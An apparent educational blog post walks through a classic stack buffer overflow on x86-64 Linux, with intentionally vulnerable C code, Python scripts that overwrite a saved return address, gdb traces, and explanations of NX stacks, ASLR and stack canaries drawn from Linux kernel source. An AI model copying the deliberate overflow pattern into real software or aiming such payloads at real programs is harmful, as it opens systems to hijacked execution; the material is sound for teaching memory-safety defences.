Classic Stack-Smashing
Table of Contents
This is an example of a classic stack-smashing attack, and some discussion about associated mitigations in Linux.
Buffer-Overflow Bugs
First, we'll write some simple vulnerable code and compile it:
/* ex.c */
#include <unistd.h>
int foo(){ char buffer[32];
read(0, buffer, 512);
return 0; }
int main(){ foo(); return 0; }
Here, the foo()
function allocates a 32-byte buffer, but then attempts to
read up to 512 bytes into it. This is a canonical buffer-overflow bug.
I find that Python is pretty useful for building nasty input in situations like this, so let's generate some to fill up this buffer:
""" gen.py """
#!/usr/bin/env python
with open('input', 'wb') as f:
f.write(b'\x41'*32)
Let's also look at the stack with gdb
and strategize a little. We'll set a
breakpoint right before we return from foo()
into the main function too.
It's important to note here that, as we add data after our 32 bytes of 0x41
,
our input is going to grow downwards in this representation.
(gdb) break *foo+30
Breakpoint 1 at 0x400779
(gdb) run < input
...
Breakpoint 1, 0x0000000000400779 in foo ()
(gdb) x/10xg $rsp
0x7fffffffe870: 0x4141414141414141 0x4141414141414141
0x7fffffffe880: 0x4141414141414141 0x4141414141414141
0x7fffffffe890: 0x00007fffffffe8b0 0x0000000000400799
0x7fffffffe8a0: 0x00007fffffffe998 0x0000000100000000
0x7fffffffe8b0: 0x00000000004007a0 0x00007ffff7814511
Now, the value immediately after our input at 0x7fffffffe890
represents the
saved base pointer of the previous frame (in this case, the base pointer for
the main function). This is not particularly interesting to us - however, after
this is the value of the return address at 0x7fffffffe898
. When foo()
returns,
our processor will set its instruction pointer -- the %rip
register on
64-bit x86 platforms -- to the value of the return address and continue execution
in the main function.
Because we can potentially write 512-32 = 480
bytes past the end of the buffer,
the bug affords us control over this return address, meaning that we have the ability
to break the normal flow of execution within the program.
Controlling Execution
Let's build input again, this time adding some bytes to write over the saved
$ebp
and the return address:
#!/usr/bin/env python
from struct import pack
with open('input', 'wb') as f:
f.write(b'\x41'*32 + \
pack("<Q", 0x7fffffffe8b0) + \
pack("<Q", 0xdeadbeef))
The calls to struct.pack
here are just for organizing our bytes
properly -- the <
just means "little-endian ordering" and Q
means
we're writing 8 bytes.
We append 8 bytes to overwrite the saved base pointer of the previous
frame (here just using the address from the gdb
output, although this
doesn't necessarily matter). Then, we'll write over the lower 4 bytes
of the return address with 0xdeadbeef
. Here's what it looks like when
we step through execution in gdb
again:
(gdb) run < input
...
Breakpoint 1, 0x0000000000400779 in foo ()
(gdb) x/10xg $rsp
0x7fffffffe870: 0x4141414141414141 0x4141414141414141
0x7fffffffe880: 0x4141414141414141 0x4141414141414141
0x7fffffffe890: 0x00007fffffffe8b0 0x00000000deadbeef
0x7fffffffe8a0: 0x00007fffffffe998 0x0000000100000000
0x7fffffffe8b0: 0x00000000004007a0 0x00007ffff7814511
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x00000000deadbeef in ?? ()
Our application throws SIGSEGV
when execution attempts to return to the main
function. Perhaps the values at address 0xdeadbeef
don't contain any bytecode
for our processor to fetch, or maybe we've attempted some kind of illegal
memory access. Let's disassemble the main function for a moment while we
reconsider our choice:
0x0000000000400780 <+0>: 55 push %rbp
0x0000000000400781 <+1>: 48 89 e5 mov %rsp,%rbp
0x0000000000400784 <+4>: 48 83 ec 10 sub $0x10,%rsp
0x0000000000400788 <+8>: 89 7d fc mov %edi,-0x4(%rbp)
0x000000000040078b <+11>: 48 89 75 f0 mov %rsi,-0x10(%rbp)
0x000000000040078f <+15>: b8 00 00 00 00 mov $0x0,%eax
0x0000000000400794 <+20>: e8 c2 ff ff ff callq 0x40075b <foo>
0x0000000000400799 <+25>: b8 00 00 00 00 mov $0x0,%eax
0x000000000040079e <+30>: c9 leaveq
0x000000000040079f <+31>: c3 retq
What if, instead of writing 0xdeadbeef
into %rip
, we wrote an address
of some other code in our binary? Let's try overwriting %rip
with
0x400798f
, which is the address in the .text
section of our program
right before we call foo()
in the main function!
Here's what execution looks like:
(gdb) run < input
...
Breakpoint 1, 0x0000000000400779 in foo ()
(gdb) x/10xg $rsp
0x7fffffffe870: 0x4141414141414141 0x4141414141414141
0x7fffffffe880: 0x4141414141414141 0x4141414141414141
0x7fffffffe890: 0x00007fffffffe8b0 0x000000000040078f
0x7fffffffe8a0: 0x00007fffffffe998 0x0000000100000000
0x7fffffffe8b0: 0x00000000004007a0 0x00007ffff7814511
(gdb) step
Single stepping until exit from function foo,
which has no line number information.
0x000000000040078f in main ()
(gdb) step
Single stepping until exit from function main,
which has no line number information.
Breakpoint 1, 0x0000000000400779 in foo ()
(gdb) cont
Continuing.
[Inferior 1 (process 5069) exited normally]
Notice how we entered our *foo+30
breakpoint twice! We wrote over %rip
with
the address of the instruction just before the call to foo()
in main. Upon
returning from foo()
, we just jumped backwards in the code to call foo()
again instead of continuing on with the main function.
Now, you might very reasonably start wondering:
"If we control the instruction pointer and have the ability to write all over the stack, what's preventing us from just writing bytecode at the beginning of that buffer and then executing it by writing over the return address with the address of the buffer?"
On modern platforms, there are actually a couple different things preventing us from just writing code on the stack and executing it. Here's a [probably non-exhaustive] list of the reasons why I haven't attempted this in the example above:
Non-Executable Stacks
First of all, modern processors have a feature which allow an operating-system to mark particular pages of virtual memory as non-executable. For instance, I know that x86-64 reserves the highest-order bit on page-table entries for use as the no-execute bit).
/* ~ arch/x86/includes/asm/pgtable_types.h @ linux-4.11.3 */
...
#define _PAGE_BIT_PRESENT 0 /* is present */
#define _PAGE_BIT_RW 1 /* writeable */
#define _PAGE_BIT_USER 2 /* userspace addressable */
#define _PAGE_BIT_PWT 3 /* page write through */
#define _PAGE_BIT_PCD 4 /* page cache disabled */
... ... ...
#define _PAGE_BIT_NX 63 /* No execute: only valid after cpuid check */
Modern GCC has the ability to compile and link your application such
that the stack is non-executable. One way you can see this is in
/proc/$pid/maps
entries, or in objdump
output:
$ cat /proc/$(pgrep ex1)/maps|grep stack
7ffd69ae9000-7ffd69b0a000 rw-p 00000000 00:00 0 [stack]
$ objdump -p bin/ex1|grep -A1 STACK
STACK off 0x0000000000000000 vaddr 0x0000000000000000 [...]
filesz 0x0000000000000000 memsz 0x0000000000000000 flags rw-
You can control this with the -z [no]execstack
GCC flag. Compare the
above output with this version of ex1.c
compiled with an executable
stack:
$ cat /proc/$(pgrep ex1-exec)/maps|grep stack
7fff07f11000-7fff07f32000 rwxp 00000000 00:00 0 [stack]
$ objdump -p bin/ex1-exec|grep -A1 STACK
STACK off 0x0000000000000000 vaddr 0x0000000000000000 [...]
filesz 0x0000000000000000 memsz 0x0000000000000000 flags rwx
NX Stack: Implementation
The objdump
output comes from reading the program header section of
the binary. An ELF file contains instructions for how to build the image of some
process in memory -- each entry describes some properties of a memory section,
and contains a p_flags
field which describes the associated permissions.
load_elf_binary()
in fs/binfmt_elf.c
is the kernel handler for ELF binaries.
This appears to be the code responsible for reading p_flags
and determining
whether or not the stack will be executable:
/* ~ fs/binfmt_elf.c:797 @ linux-4.11.3 */
...
for (i = 0; i < loc->elf_ex.e_phnum; i++, elf_ppnt++)
switch (elf_ppnt->p_type) {
case PT_GNU_STACK:
if (elf_ppnt->p_flags & PF_X)
executable_stack = EXSTACK_ENABLE_X;
else
executable_stack = EXSTACK_DISABLE_X;
break;
...
Eventually, this code calls the setup_arg_pages()
function in fs/exec.c
which passes this information into a call to mprotect_fixup()
.
/* ~ fs/exec.c:718 @ linux-4.11.3 */
...
/*
* Adjust stack execute permissions; explicitly enable for
* EXSTACK_ENABLE_X, disable for EXSTACK_DISABLE_X and leave alone
* (arch default) otherwise.
*/
if (unlikely(executable_stack == EXSTACK_ENABLE_X))
vm_flags |= VM_EXEC;
else if (executable_stack == EXSTACK_DISABLE_X)
vm_flags &= ~VM_EXEC;
vm_flags |= mm->def_flags;
vm_flags |= VM_STACK_INCOMPLETE_SETUP;
ret = mprotect_fixup(vma, &prev, vma->vm_start, vma->vm_end,
vm_flags);
...
Ultimately, contiguous regions of memory are described by vm_area_struct
VMA objects in the kernel. mprotect_fixup()
is the actual operation
responsible for setting permissions on the stack's VMA here with
vma->vm_flags = newflags
.
Presumably the permissions on VMAs have some bearing on the permissions associated with underlying pages, although this is kind of unclear to me at the moment.
Randomization
On modern platforms, base addresses for memory allocations are randomized by an operating-system feature called ASLR (for Address Space Layout Randomization). Observe this code:
/* ex2.c */
#include <unistd.h>
#include <stdio.h>
int foo(){ char buffer[512];
printf("buffer is at %p\n", &buffer);
read(0, buffer, 2048);
return 0; }
int main(){ foo(); return 0; }
If we run this a couple times, you'll notice that the address of char buffer[512]
is not fixed in any sense:
$ for i in {0..10..1}; do ./ex2 <<<"foo"; done
buffer is at 0x7fff0d7a64e0
buffer is at 0x7ffccd9451e0
buffer is at 0x7ffd2b1bd210
buffer is at 0x7ffd92dca5b0
buffer is at 0x7ffe4df69740
buffer is at 0x7ffc95787d00
buffer is at 0x7ffc9a42a860
buffer is at 0x7ffee99e5110
buffer is at 0x7ffe10df6430
buffer is at 0x7fff625094d0
buffer is at 0x7ffe95630e10
Say that you had written a bunch of nasty bytecode onto the stack, had
control over the instruction pointer, and let's say that you even had
an executable stack to work with. In order to point %rip
at some bytecode
in our input, we'd need to know the starting address of our input beforehand.
The position of our program's .text
section in memory is perfectly
deterministic, which is why breaking the flow of execution was easy in the
first example. Here, it's not so simple. The most obvious strategy here
would be to try addresses at random, but this is not exactly the best situation.
At this point, you might consider that there are other sections of our program to target that are executable. [Un]fortunately, the bases of those sections are probably randomized too! For example, shared libraries:
$ for i in {0..10..1}; do ldd ex2 | grep libc; done
libc.so.6 => /usr/lib/libc.so.6 (0x00007f154ff10000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007ff3db6e5000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007fe8e9022000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007fa4f4469000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007fb632b44000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007f5f666cd000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007fe732fff000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007f67170b0000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007f5dbfdd7000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007fe710a38000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007f3e710b4000)
Address-Space Randomization: Implementation
Again, we're back in fs/binfmt_elf.c
. Looks like the handler for ELF
binaries (load_elf_binary()
, in case you forgot) sets current->flags
accordingly for the new process. The PF_RANDOMIZE
flag designates that
the virtual address space of the process will be randomized when it
is initialized.
/* ~ fs/binfmt_elf.c:867 @ linux-4.11.3 */
...
if(!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space)
current->flags |= PF_RANDOMIZE;
setup_new_exec(bprm);
...
In the same file, randomize_stack_top()
is called to suitably randomize the
top of the stack (immediately before calling setup_arg_pages()
as described in the previous section -- this function also adds some randomness).
Early in setup_new_exec()
, the mm->mmap_legacy_base
field in the memory
descriptor is randomized by calling arch_pick_mmap_layout()
in
arch/x86/mm/mmap.c
. It also looks like that function randomizes the gaps
between allocations.
arch_mmap_rnd()
is the actual function that generates random numbers for
the offsets with get_random_long()
.
Immediately after this, load_elf_binary()
has to loop through and map the
rest of the sections into memory while adding random offsets to the base
addresses. This piece appears to randomize offsets for shared sections:
/* ~ fs/binfmt_elf.c:873 @ linux-4.11.3 */
...
/* Now we do a little grungy work by mmapping the ELF image into
the correct location in memory. */
for(i = 0, elf_ppnt = elf_phdata;
i < loc->elf_ex.e_phnum; i++, elf_ppnt++) {
...
} else if (loc->elf_ex.e_type == ET_DYN) {
...
load_bias = ELF_ET_DYN_BASE - vaddr;
if (current->flags & PF_RANDOMIZE)
load_bias += arch_mmap_rnd();
...
... and later, the data segment is randomized too via arch_randomize_brk()
in arch/x86/kernel/process.c
(which is basically just a wrapper around
randomize_page()
in drivers/char/random.c
):
/* ~ fs/binfmt_elf.c:1077 @ linux-4.11.3 */
...
if ((current->flags & PF_RANDOMIZE) && (randomize_va_space > 1)) {
current->mm->brk = current->mm->start_brk =
arch_randomize_brk(current->mm);
...
In case you're unfamiliar, randomize_va_space
here refers to the name of
the sysctl
parameter used to control address space randomization (which
is usually turned on to some degree by default).
`/* ~ Documentation/sysctl/kernel.txt */
...
randomize_va_space:
This option can be used to select the type of process address
space randomization that is used in the system, for architectures
that support this feature.
0 - Turn the process address space randomization off. This is the
default for architectures that do not support this feature anyways,
and kernels that are booted with the "norandmaps" parameter.
1 - Make the addresses of mmap base, stack and VDSO page randomized.
This, among other things, implies that shared libraries will be
loaded to random addresses. Also for PIE-linked binaries, the
location of code start is randomized. This is the default if the
CONFIG_COMPAT_BRK option is enabled.
2 - Additionally enable heap randomization. This is the default if
CONFIG_COMPAT_BRK is disabled.
There are a few legacy applications out there (such as some ancient
versions of libc.so.5 from 1996) that assume that brk area starts
just after the end of the code+bss. These applications break when
start of the brk area is randomized. There are however no known
non-legacy applications that would be broken this way, so for most
systems it is safe to choose full randomization.
Systems with ancient and/or broken binaries should be configured
with CONFIG_COMPAT_BRK enabled, which excludes the heap from process
address space randomization.
Stack Canaries
One simple way of mitigating the threat of stack-smashing is to compile your
application with GCC's -fstack-protector
flag, ie.
$ make ex1-fixed
gcc ex1.c -o ../bin/ex1-stack-protector -fstack-protector
$ ./bin/ex1-stack-protector < input
*** stack smashing detected ***: ./bin/ex1-stack-protector terminated
...
Aborted (core dumped)
Our program just aborts now, but how is this accomplished?
Let's see what gdb
has to say about this after we feed it some harmless
input (only 32 bytes):
$ gdb -batch -ex 'file bin/ex1-stack-protector' -ex 'break *foo+45' \
> -ex 'run < input' -ex 'x/10xg $rsp' -ex 'disas main'
Breakpoint 1 at 0x400593
Breakpoint 1, 0x0000000000400593 in foo ()
0x7fffffffdf70: 0x4141414141414141 0x4141414141414141
0x7fffffffdf80: 0x4141414141414141 0x4141414141414141
0x7fffffffdf90: 0x00000000004005d0 0xa719e95716303300
0x7fffffffdfa0: 0x00007fffffffdfb0 0x00000000004005bc
0x7fffffffdfb0: 0x00000000004005d0 0x00007ffff7a56511
Dump of assembler code for function main:
0x00000000004005ae <+0>: push %rbp
0x00000000004005af <+1>: mov %rsp,%rbp
0x00000000004005b2 <+4>: mov $0x0,%eax
0x00000000004005b7 <+9>: callq 0x400566 <foo>
0x00000000004005bc <+14>: mov $0x0,%eax
0x00000000004005c1 <+19>: pop %rbp
0x00000000004005c2 <+20>: retq
End of assembler dump.
It looks like the boundary between the two frames has changed slightly!
Here, 0x7fffffffdfa8
contains the return address which points %rip
back into the main function. It seems like GCC has padded the space
in-between the stack and the previous frame with a few bytes.
The 8-byte value 0xa719e95716303300
before the saved base address and
return address is called the stack canary. This is the mechanism that
-fstack-protector
uses to detect stack-smashing. In order to see how,
we'll write past the buffer with 64 bytes this time and look at the
disassembly for foo()
in gdb
again. First, some input:
#!/usr/bin/env python
from struct import pack
with open('input', 'wb') as f:
f.write(b'\x41'*40 + \
pack("<Q", 0xbbbbbbbbbbbbbbbb) + \ # write over canary
pack("<Q", 0xcccccccccccccccc) + \ # write over saved base
pack("<Q", 0x4005b2)) # write over return addr
Adding the flag has changed the behaviour of foo()
to some degree.
By default, -fstack-protector
changes the prologue and epilogue of
functions that (a) allocate buffers >8 bytes on the stack; and/or (b)
call alloca()
(for explicitly allocating memory on the stack).
Here's what it looks like now:
Dump of assembler code for function foo:
0x0000000000400566 <+0>: push %rbp
0x0000000000400567 <+1>: mov %rsp,%rbp
0x000000000040056a <+4>: sub $0x30,%rsp
+ 0x000000000040056e <+8>: mov %fs:0x28,%rax
+ 0x0000000000400577 <+17>: mov %rax,-0x8(%rbp)
+ 0x000000000040057b <+21>: xor %eax,%eax
0x000000000040057d <+23>: lea -0x30(%rbp),%rax
0x0000000000400581 <+27>: mov $0x200,%edx
0x0000000000400586 <+32>: mov %rax,%rsi
0x0000000000400589 <+35>: mov $0x0,%edi
0x000000000040058e <+40>: callq 0x400460 <read@plt>
0x0000000000400593 <+45>: mov $0x0,%eax
+ 0x0000000000400598 <+50>: mov -0x8(%rbp),%rcx
+ 0x000000000040059c <+54>: xor %fs:0x28,%rcx
+ 0x00000000004005a5 <+63>: je 0x4005ac <foo+70>
+ 0x00000000004005a7 <+65>: callq 0x400450 <__stack_chk_fail@plt>
0x00000000004005ac <+70>: leaveq
0x00000000004005ad <+71>: retq
End of assembler dump.
And these are the new instructions are used to set up the canary on the stack:
mov %fs:0x28,%rax ; Put canary value in $rax
mov %rax,-0x8(%rbp) ; Put canary value on the stack
xor %eax,%eax ; Clear $rax
... ... ; Your function goes here
mov -0x8(%rbp),%rcx ; Read the canary value on the stack
xor %fs:0x28,%rcx ; xor with known-good value
je 0x4005ac <foo+70> ; if 0, continue execution
callq 0x400450 <__stack_chk_fail@plt> ; otherwise, abort
Stack Canaries: Implementation
It looks like there's a stack canary field in
task_struct
. You can see a call to get_random_long()
in
kernel/fork.c
:
/* ~ kernel/fork.c:533 @ linux-4.11.3) */
...
setup_thread_stack(tsk, orig);
clear_user_return_notifier(tsk);
clear_tsk_need_resched(tsk);
set_task_stack_end_magic(tsk);
#ifdef CONFIG_CC_STACKPROTECTOR
tsk->stack_canary = get_random_long();
#endif
...
And from the task_struct
definition in include/linux/sched.h
:
/* ~ include/linux/sched.h:483 @ linux-4.11.3 */
#ifdef CONFIG_CC_STACKPROTECTOR
/* Canary value for the -fstack-protector GCC feature: */
unsigned long stack_canary;
#endif
The value is actually initialized in init/main.c
in the
start_kernel()
function by calling boot_init_stack_canary()
from arch/x86/include/asm/stackprotector.h
. This happens when
the kernel starts:
/* ~ arch/x86/include/asm/stackprotector.h:60 @ linux-4.11.3 */
...
static __always_inline void boot_init_stack_canary(void)
{
u64 canary;
u64 tsc;
#ifdef CONFIG_X86_64
BUILD_BUG_ON(offsetof(union irq_stack_union, stack_canary) != 40);
#endif
/*
* We both use the random pool and the current TSC as a source
* of randomness. The TSC only matters for very early init,
* there it already has some randomness on most systems. Later
* on during the bootup the random pool has true entropy too.
*/
get_random_bytes(&canary, sizeof(canary));
tsc = rdtsc();
canary += tsc + (tsc << 32UL);
current->stack_canary = canary;
#ifdef CONFIG_X86_64
this_cpu_write(irq_stack_union.stack_canary, canary);
#else
this_cpu_write(stack_canary.canary, canary);
#endif
}
...
Presumably this is how the references to %fs:0x28
in the disassembly
work. I actually don't know how the segment registers work, so I guess
I 'ought to let stackprotector.h
speak for itself here:
/*
* GCC stack protector support.
*
* Stack protector works by putting predefined pattern at the start of
* the stack frame and verifying that it hasn't been overwritten when
* returning from the function. The pattern is called stack canary
* and unfortunately gcc requires it to be at a fixed offset from %gs.
* On x86_64, the offset is 40 bytes and on x86_32 20 bytes. x86_64
* and x86_32 use segment registers differently and thus handles this
* requirement differently.
*
* On x86_64, %gs is shared by percpu area and stack canary. All
* percpu symbols are zero based and %gs points to the base of percpu
* area. The first occupant of the percpu area is always
* irq_stack_union which contains stack_canary at offset 40. Userland
* %gs is always saved and restored on kernel entry and exit using
* swapgs, so stack protector doesn't add any complexity there.
*
* On x86_32, it's slightly more complicated. As in x86_64, %gs is
* used for userland TLS. Unfortunately, some processors are much
* slower at loading segment registers with different value when
* entering and leaving the kernel, so the kernel uses %fs for percpu
* area and manages %gs lazily so that %gs is switched only when
* necessary, usually during task switch.
*
* As gcc requires the stack canary at %gs:20, %gs can't be managed
* lazily if stack protector is enabled, so the kernel saves and
* restores userland %gs on kernel entry and exit. This behavior is
* controlled by CONFIG_X86_32_LAZY_GS and accessors are defined in
* system.h to hide the details.
*/
Topics for Next Time
I think the next post might actually proceed with exploitation in the face of some of the mitigations explored here (probably not all of them at once). There will most likely be some discussion about ret2libc, and potentially some really bad attempts at return-oriented programming (although we'll see how that goes).